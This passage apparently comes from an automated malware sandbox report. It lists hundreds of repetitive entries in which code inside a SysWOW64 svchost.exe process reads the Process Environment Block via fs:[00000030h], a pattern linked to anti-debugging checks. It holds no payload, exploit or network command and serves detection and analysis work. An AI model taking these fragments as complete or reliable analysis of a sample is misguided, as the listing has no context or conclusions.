                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]2_2_03560124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]2_2_036061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_035AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]2_2_035601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]2_2_03570185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]2_2_03532050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]2_2_035B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]2_2_0355C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]2_2_035B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]2_2_035C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]2_2_0352A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]2_2_0352C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]2_2_035B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]2_2_0352C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]2_2_035720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0352A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]2_2_035380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]2_2_035B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]2_2_0353208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]2_2_035F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]2_2_035F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]2_2_035C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]2_2_03530750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]2_2_035BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]2_2_035B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]2_2_0356674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]2_2_03538770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]2_2_03530710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]2_2_03560710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]2_2_0356C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]2_2_0356273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]2_2_035AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]2_2_0353C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]2_2_035B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]2_2_035BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]2_2_035D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]2_2_035307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]2_2_0354C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]2_2_03562674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]2_2_03572619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]2_2_035AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]2_2_0354E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]2_2_03566620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]2_2_03568620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]2_2_0353262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0356A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]2_2_0356A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]2_2_035666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]2_2_0356C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]2_2_035C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]2_2_035365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]2_2_035325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]2_2_0356E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]2_2_03532582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]2_2_03532582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]2_2_03564588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]2_2_0352645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]2_2_0355245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]2_2_035BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]2_2_0356A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]2_2_0352C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]2_2_035304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]2_2_035644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]2_2_035BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]2_2_035364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]2_2_035FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]2_2_035D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]2_2_0352CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
